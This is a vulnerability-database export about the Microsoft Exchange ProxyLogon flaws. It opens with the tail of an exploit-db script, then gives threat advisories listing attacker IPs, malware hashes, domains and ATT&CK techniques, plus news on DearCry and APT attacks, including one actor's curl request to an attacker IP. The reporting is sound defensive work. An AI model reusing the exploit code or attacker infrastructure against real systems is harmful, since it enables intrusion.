\"r\")\r\n for user in list_users:\r\n checkEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__)\r\n\r\n print(\"[!!!] 
FINISHED OhhWAA\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/49879", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nMicrosoft Exchange Server vulnerabilities have been officially patched for five months now, yet they are still being actively exploited by multiple threat actors in the campaign tracked as DeadRinger. DeadRinger has been affecting the telecommunications industry around the world and consists of three activity clusters. The first is the Soft Cell group, which has been active since 2012. The Naikon group, whose activity in this campaign dates from 2020, is the second cluster. We discovered that the signatures match those of TG-3390, making it the third cluster.\n\nIn response, Hive Pro Threat Researchers advise that you address these vulnerabilities.\n\nThe techniques used in DeadRinger include: \nT1592: Gather Victim Host Information \nT1595: Active Scanning \nT1590: Gather Victim Network Information \nT1190: Exploit Public-Facing Application \nT1059: Command and Scripting Interpreter \nT1047: Windows Management Instrumentation \nT1059.001: Command and Scripting Interpreter: PowerShell \nT1505.003: Server Software Component: Web Shell \nT1136: Create Account \nT1053: Scheduled Task/Job \nT1078: Valid Accounts \nT1574: Hijack Execution Flow \nT1027.005: Obfuscated Files or Information: Indicator Removal from Tools \nT1027: Obfuscated Files or Information \nT1036: Masquerading \nT1070.006: Indicator Removal on Host: Timestomp \nT1140: Deobfuscate/Decode Files or Information \nT1040: Network Sniffing \nT1087: Account Discovery \nT1018: Remote System Discovery \nT1071.001: Application Layer Protocol: Web Protocols \nT1041: Exfiltration Over C2 Channel \nT1021.002: Remote Services: 
SMB/Windows Admin Shares \nT1550.002: Use Alternate Authentication Material: Pass the Hash \nT1105: Ingress Tool Transfer \nT1555: Credentials from Password Stores \nT1003: OS Credential Dumping \nT1016: System Network Configuration Discovery \nT1069: Permission Groups Discovery \nT1560: Archive Collected Data \nT1569: System Services \nT1543.003: Create or Modify System Process: Windows Service \nT1574.002: Hijack Execution Flow: DLL Side-Loading \nT1570: Lateral Tool Transfer \nT1056.001: Input Capture: Keylogging \nT1573: Encrypted Channel\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 47.56.86[.]44 \n45.76.213[.]2 \n45.123.118[.]232 \n101.132.251[.]212 \nSHA-1 Hash | 19e961e2642e87deb2db6ca8fc2342f4b688a45c \nba8f2843e2fb5274394b3c81abc3c2202d9ba592 \n243cd77cfa03f58f6e6568e011e1d6d85969a3a2 \nc549a16aaa9901c652b7bc576e980ec2a008a2e0 \nc2850993bffc8330cff3cb89e9c7652b8819f57f \n440e04d0cc5e842c94793baf31e0d188511f0ace \ne2340b27a4b759e0e2842bfe5aa48dda7450af4c \n15336340db8b73bf73a17c227eb0c59b5a4dece2 \n5bc5dbe3a2ffd5ed1cd9f0c562564c8b72ae2055 \n0dc49c5438a5d80ef31df4a4ccaab92685da3fc6 \n81cfcf3f8213bce4ca6a460e1db9e7dd1474ba52 \ne93ceb7938120a87c6c69434a6815f0da42ab7f2 \n207b7cf5db59d70d4789cb91194c732bcd1cfb4b \n71999e468252b7458e06f76b5c746a4f4b3aaa58 \n39c5c45dbec92fa99ad37c4bab09164325dbeea0 \nefc6c117ecc6253ed7400c53b2e148d5e4068636 \na3c5c0e93f6925846fab5f3c69094d8a465828e9 \na4232973418ee44713e59e0eae2381a42db5f54c \n5602bf8710b1521f6284685d835d5d1df0679b0f \ne3fcda85f5f42a2bffb65f3b8deeb523f8db2302 \n720556854fb4bcf83b9ceb9515fbe3f5cb182dd5 \nb699861850e4e6fde73dfbdb761645e2270f9c9a \n6516d73f8d4dba83ca8c0330d3f180c0830af6a0 \n99f8263808c7e737667a73a606cbb8bf0d6f0980 \na5b193118960184fe3aa3b1ea7d8fd1c00423ed6 \n92ce6af826d2fb8a03d6de7d8aa930b4f94bc2db \nd9e828fb891f033656a0797f5fc6d276fbc9748f \n87c3dc2ae65dcd818c12c1a4e4368f05719dc036 \nDomain | 
Cymkpuadkduz[.]xyz \nnw.eiyfmrn[.]com \njdk.gsvvfsso[.]com \nttareyice.jkub[.]com \nmy.eiyfmrn[.]com \nA.jrmfeeder[.]org \nafhkl.dseqoorg[.]com \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>\n\n#### References\n\n<https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos>\n\n<https://www.zdnet.com/article/deadringer-chinese-apts-strike-major-telecommunications-companies/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T11:01:05", "type": "hivepro", "title": "Have you patched the vulnerabilities in Microsoft Exchange Server?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-08-18T11:01:05", "id": "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "href": 
"https://www.hivepro.com/have-you-patched-the-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-24T14:24:49", "description": "THREAT LEVEL: Red.\n\nFor a detailed advisory, download the pdf file here.\n\nThe Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency released threat advisories on AvosLocker Ransomware. It is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations in critical infrastructure sectors such as financial services, manufacturing plants, and government facilities in countries such as the United States, Saudi Arabia, the United Kingdom, Germany, Spain, and the United Arab Emirates, among others. After its affiliates infect targets, AvosLocker claims to handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data. The AvosLocker ransomware is a multi-threaded C++ Windows executable that operates as a console application and displays a log of actions performed on victim computers. For the delivery of the ransomware payload, the attackers use spam email campaigns as the initial infection vector. The threat actors exploit the Proxy Shell vulnerabilities CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, as well as CVE-2021-26855, to gain access to the victim\u2019s machine and then deploy Mimikatz to steal passwords. Furthermore, the threat actors can use the stolen credentials to get RDP access to the domain controller and then exfiltrate data from the compromised machine. Finally, the attacker installs AvosLocker ransomware on the victim's computer and encrypts the victim's documents and files with the \".avos\" extension. The actor then leaves a ransom letter in each directory named \"GET YOUR FILES BACK.txt\" with a link to an AvosLocker .onion payment site. 
\n\nOrganizations can mitigate the risk by following these recommendations:\n\n\u2022 Keep all operating systems and software up to date.\n\u2022 Remove unnecessary access to administrative shares.\n\u2022 Maintain offline backups of data and ensure all backup data is encrypted and immutable.\n\nThe MITRE TTPs commonly used by AvosLocker are:\n\nTA0001: Initial Access\nTA0002: Execution\nTA0007: Discovery\nTA0040: Impact\nT1566: Phishing\nT1204: User Execution\nT1082: System Information Discovery\nT1490: Inhibit System Recovery\nT1489: Service Stop\nT1486: Data Encrypted for Impact\n\nActor Detail\n\nVulnerability Details\n\nIndicators of Compromise (IoCs)\n\nPatches\n\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206\n\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207\n\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473\n\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523\n\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855\n\nRecent Breaches\n\nhttps://www.unical.com/\n\nhttps://www.paccity.net/\n\nhttps://www.gigabyte.com/\n\nReference\n\nhttps://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-24T06:30:44", "type": "hivepro", "title": "AvosLocker Ransomware group has targeted 50+ Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-24T06:30:44", "id": "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "href": "https://www.hivepro.com/avoslocker-ransomware-group-has-targeted-50-organizations-worldwide/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here.\n\nPublished Vulnerabilities: 340\nInteresting Vulnerabilities: 10\nActive Threat Groups: 5\nTargeted Countries: 53\nTargeted Industries: 24\nATT&CK TTPs: 84\n\nThe fourth week of March 2022 witnessed the discovery of 340 vulnerabilities, out of which 10 gained the attention of threat actors and security researchers worldwide. Among these 10, 1 is undergoing reanalysis and 2 were not present in the NVD at all. The Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. Lapsus$, a new extortion threat actor group that had attacked popular organizations such as the Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Okta, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, the North Korean state hackers known as Lazarus Group were exploiting the zero-day vulnerability in the Google Chrome web browser (CVE-2022-0609). AvosLocker, a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations, is currently exploiting the Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). 
The threat actor APT35, aka Magic Hound, an Iranian-backed threat group, is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. The South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below.\n\nDetailed Report:\n\nInteresting Vulnerabilities:\n\nCVEs | Patch Link\n---|---\nCVE-2021-34484, CVE-2022-21919 | https://central.0patch.com/auth/login\nCVE-2022-0609*, CVE-2022-1096* | https://www.google.com/intl/en/chrome/?standalone=1\nCVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855 | https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855\nCVE-2022-0543 | https://security-tracker.debian.org/tracker/CVE-2022-0543\n\nActive Actors:\n\nName | Origin | Motive\n---|---|---\nAPT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) | Iran | Information theft and espionage\nAvosLocker | Unknown | Ecrime, Information theft, and Financial gain\nLazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) | North Korea | Information theft and espionage, Sabotage and destruction, Financial crime\nLapsus$ (DEV-0537) | Unknown | Data theft and Destruction\nDarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) | South Korea | Information theft and espionage\n\nTargeted Location:\n\nTargeted Sectors:\n\nCommon TTPs:\n\nTA0042: Resource Development\nTA0001: Initial Access\nTA0002: Execution\nTA0003: Persistence\nTA0004: Privilege 
Escalation\nTA0005: Defense Evasion\nTA0006: Credential Access\nTA0007: Discovery\nTA0008: Lateral Movement\nTA0009: Collection\nTA0011: Command and Control\nTA0010: Exfiltration\nTA0040: Impact\nT1583: Acquire Infrastructure\nT1189: Drive-by Compromise\nT1059: Command and Scripting Interpreter\nT1098: Account Manipulation\nT1548: Abuse Elevation Control Mechanism\nT1548: Abuse Elevation Control Mechanism\nT1110: Brute Force\nT1010: Application Window Discovery\nT1021: Remote Services\nT1560: Archive Collected Data\nT1071: Application Layer Protocol\nT1048: Exfiltration Over Alternative Protocol\nT1485: Data Destruction\nT1583.001: Domains\nT1190: Exploit Public-Facing Application\nT1059.001: PowerShell\nT1547: Boot or Logon Autostart Execution\nT1134: Access Token Manipulation\nT1134: Access Token Manipulation\nT1110.003: Password Spraying\nT1083: File and Directory Discovery\nT1021.001: Remote Desktop Protocol\nT1560.003: Archive via Custom Method\nT1071.001: Web Protocols\nT1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol\nT1486: Data Encrypted for Impact\nT1583.006: Web Services\nT1133: External Remote Services\nT1059.005: Visual Basic\nT1547.006: Kernel Modules and Extensions\nT1134.002: Create Process with Token\nT1134.002: Create Process with Token\nT1056: Input Capture\nT1120: Peripheral Device Discovery\nT1021.002: SMB/Windows Admin Shares\nT1560.002: Archive via Library\nT1132: Data Encoding\nT1041: Exfiltration Over C2 Channel\nT1491: Defacement\nT1587: Develop Capabilities\nT1566: Phishing\nT1059.004: Unix Shell\nT1547.001: Registry Run Keys / Startup Folder\nT1547: Boot or Logon Autostart Execution\nT1564: Hide Artifacts\nT1056.004: Credential API Hooking\nT1057: Process Discovery\nT1021.004: SSH\nT1213: Data from Information Repositories\nT1132.001: Standard Encoding\nT1537: Transfer Data to Cloud Account\nT1491.001: Internal Defacement\nT1587.001: Malware\nT1566.001: Spearphishing Attachment\nT1059.003: Windows Command Shell\nT1547.009: Shortcut Modification\nT1547.006: Kernel Modules and 
Extensions\nT1564.001: Hidden Files and Directories\nT1056.001: Keylogging\nT1012: Query Registry\nT1005: Data from Local System\nT1001: Data Obfuscation\nT1561: Disk Wipe\nT1588: Obtain Capabilities\nT1199: Trusted Relationship\nT1203: Exploitation for Client Execution\nT1543: Create or Modify System Process\nT1547.001: Registry Run Keys / Startup Folder\nT1562: Impair Defenses\nT1003: OS Credential Dumping\nT1082: System Information Discovery\nT1074: Data Staged\nT1001.003: Protocol Impersonation\nT1561.001: Disk Content Wipe\nT1588.004: Digital Certificates\nT1078: Valid Accounts\nT1106: Native API\nT1543.003: Windows Service\nT1547.009: Shortcut Modification\nT1562.004: Disable or Modify System Firewall\nT1111: Two-Factor Authentication Interception\nT1016: System Network Configuration Discovery\nT1074.001: Local Data Staging\nT1573: Encrypted Channel\nT1561.002: Disk Structure Wipe\nT1588.006: Vulnerabilities\nT1053: Scheduled Task/Job\nT1133: External Remote Services\nT1543: Create or Modify System Process\nT1562.001: Disable or Modify Tools\nT1552: Unsecured Credentials\nT1033: System Owner/User Discovery\nT1056: Input Capture\nT1573.001: Symmetric Cryptography\nT1490: Inhibit System Recovery\nT1204: User Execution\nT1137: Office Application Startup\nT1543.003: Windows Service\nT1070: Indicator Removal on Host\nT1124: System Time Discovery\nT1056.004: Credential API Hooking\nT1008: Fallback Channels\nT1489: Service Stop\nT1204.002: Malicious File\nT1542: Pre-OS Boot\nT1068: Exploitation for Privilege Escalation\nT1070.004: File Deletion\nT1056.001: Keylogging\nT1105: Ingress Tool Transfer\nT1529: System Shutdown/Reboot\nT1047: Windows Management Instrumentation\nT1542.003: Bootkit\nT1055: Process Injection\nT1070.006: Timestomp\nT1571: Non-Standard Port\nT1053: Scheduled Task/Job\nT1055.001: Dynamic-link Library Injection\nT1036: Masquerading\nT1090: Proxy\nT1505: Server Software Component\nT1053: Scheduled Task/Job\nT1036.005: Match Legitimate Name or Location\nT1090.002: External Proxy\nT1505.003: Web Shell\nT1078: Valid 
Accounts\nT1027: Obfuscated Files or Information\nT1078: Valid Accounts\nT1027.006: HTML Smuggling\nT1027.002: Software Packing\nT1542: Pre-OS Boot\nT1542.003: Bootkit\nT1055: Process Injection\nT1055.001: Dynamic-link Library Injection\nT1218: Signed Binary Proxy Execution\nT1218.001: Compiled HTML File\nT1078: Valid Accounts\nT1497: Virtualization/Sandbox Evasion\n\nThreat Advisories:\n\nMicrosoft\u2019s privilege escalation vulnerability that refuses to go away\n\nGoogle Chrome\u2019s second zero-day in 2022\n\nMagic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities\n\nAvosLocker Ransomware group has targeted 50+ Organizations Worldwide\n\nNorth Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability\n\nLAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung\n\nDarkHotel APT group targeting the Hospitality Industry in China\n\nNew Threat Actor using Serpent Backdoor attacking French Entities\n\nMuhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-03-16T14:17:03", "description": "Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.\n\nThe ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft [issued emergency patches in early March](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) for four Microsoft Exchange flaws. The flaws [can be chained together](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>) to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials.\n\nThe flaws give attackers the opportunity to install a webshell for further exploitation within the environment \u2014 and now, researchers say attackers are downloading the new ransomware strain (a.k.a. 
Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.\n\n\u201cWe have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,\u201d Microsoft said [on Twitter](<https://twitter.com/MsftSecIntel/status/1370236539427459076>), Thursday.\n\n## **DearCry Ransomware**\n\nDearCry first came onto the infosec space\u2019s radar after ransomware expert Michael Gillespie [on Thursday said he observed](<https://twitter.com/demonslay335/status/1370125343571509250>) a \u201csudden swarm\u201d of submissions to his ransomware identification website, ID-Ransomware.\n\nThe ransomware uses the extension \u201c.CRYPT\u201d when encrypting files, as well as a filemarker \u201cDEARCRY!\u201d in the string for each encrypted file.\n\n[Microsoft later confirmed](<https://twitter.com/phillip_misner/status/1370197696280027136>) that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nAccording to a [report by BleepingComputer](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/amp/>), the ransomware drops a ransom note (called \u2018readme.txt\u2019) after initially infecting the victim \u2013 which contains two email addresses for the threat actors and demands a ransom payment of $16,000.\n\nMeanwhile, [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1370130753586102272>) on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. 
On Twitter, MalwareHunterTeam said the ransomware is \u201cnot that very widespread (yet?).\u201d Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which [can be found here](<https://twitter.com/malwrhunterteam/status/1370271414855593986>)).\n\n## **Microsoft Exchange Attacks Doubling Every Hour**\n\nExploitation activity for the recently patched Exchange flaws continues to skyrocket, [with researchers this week warning](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.\n\n[New research by Check Point Software](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) said in the past 24 hours alone, the number of exploitation attempts on organizations has doubled every two to three hours.\n\nResearchers said they saw hundreds of exploit attempts against organizations worldwide \u2013 with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).\n\nResearchers warned that exploitation activity will continue \u2014 and urged companies that have not already done so to patch.\n\n\u201cSince the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,\u201d according to Check Point researchers. 
\u201cGlobal experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-12T16:26:07", "type": "threatpost", "title": "Microsoft Exchange Exploits Pave a Ransomware Path", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-12T16:26:07", "id": "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "href": "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-11T21:58:44", "description": "Recently patched Microsoft Exchange vulnerabilities are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world. Overall exploitation activity is snowballing, according to researchers.\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. 
Four flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a webshell for further exploitation within the environment.\n\nAnd indeed, adversaries from the Chinese APT known as Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nMicrosoft was spurred to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) for the exploited bugs, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\n## **Rapidly Spreading Email Server Attacks**\n\nMicrosoft said last week that the attacks were \u201climited and targeted.\u201d But that\u2019s certainly no longer the case. Other security companies have [continued to say](<https://twitter.com/0xDUDE/status/1369302347617349642>) they have seen much broader, escalating activity with mass numbers of servers being scanned and attacked.\n\nESET researchers [had confirmed this](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as well, and on Wednesday announced that they had pinpointed at least 10 APTs going after the bugs, including Calypso, LuckyMouse, Tick and Winnti Group.\n\n\u201cOn Feb. 28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by LuckyMouse, Calypso and the Winnti Group,\u201d according to [the writeup](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>). 
\u201cThis suggests that multiple threat actors gained access to the details of the vulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by reverse-engineering Microsoft updates.\u201d\n\n> The [@DIVDnl](<https://twitter.com/DIVDnl?ref_src=twsrc%5Etfw>) scanned over 250K Exchange servers. Sent over 46k emails to the owners. The amount of vulnerable servers is going down. The number of compromised systems is going up. More organizations start investigating their systems for [#Hafnium](<https://twitter.com/hashtag/Hafnium?src=hash&ref_src=twsrc%5Etfw>) exploits.<https://t.co/XmQhHd7OA9>\n> \n> \u2014 Victor Gevers (@0xDUDE) [March 9, 2021](<https://twitter.com/0xDUDE/status/1369302347617349642?ref_src=twsrc%5Etfw>)\n\nThis activity was quickly followed by a raft of other groups, including CactusPete and Mikroceen \u201cscanning and compromising Exchange servers en masse,\u201d according to ESET.\n\n\u201cWe have already detected webshells on more than 5,000 email servers [in more than 115 countries] as of the time of writing, and according to public sources, [several important organizations](<https://twitter.com/sundhaug92/status/1369669037924483087>), such as the European Banking Authority, suffered from this attack,\u201d according to the ESET report.\n\nIt also appears that threat groups are piggybacking on each other\u2019s work. For instance, in some cases the webshells were dropped into Offline Address Book (OAB) configuration files, and they appeared to be accessed by more than one group.\n\n\u201cWe cannot discount the possibility that some threat actors might have hijacked the webshells dropped by other groups rather than directly using the exploit,\u201d said ESET researchers. \u201cOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware through it. 
We also noticed in some cases that several threat actors were targeting the same organization.\u201d\n\n## **Zero-Day Activity Targeting Microsoft Exchange Bugs**\n\nESET has documented a raft of activity targeting the four vulnerabilities, including multiple zero-day compromises before Microsoft rolled patches out.\n\nFor instance, Tick, which has been infiltrating organizations primarily in Japan and South Korea since 2008, was seen compromising the webserver of an IT company based in East Asia two days before Microsoft released its patches for the Exchange flaws.\n\n\u201cWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group,\u201d ESET researchers said. \u201cIts main objective seems to be intellectual property and classified information theft.\u201d\n\n\n\nA timeline of ProxyLogon activity. Source: ESET.\n\nOne day before the patches were released, LuckyMouse (a.k.a. APT27 or Emissary Panda) compromised the email server of a governmental entity in the Middle East, ESET observed. The group is cyberespionage-focused and is known for breaching multiple government networks in Central Asia and the Middle East, along with transnational organizations like the International Civil Aviation Organization (ICAO) in 2016.\n\n\u201cLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg webshell and issued a GET request to http://34.90.207[.]23/ip using curl,\u201d according to ESET\u2019s report. \u201cFinally, they attempted to install their SysUpdate (a.k.a. Soldier) modular backdoor.\u201d\n\nThat same day, still in the zero-day period, the Calypso spy group compromised the email servers of governmental entities in the Middle East and in South America. 
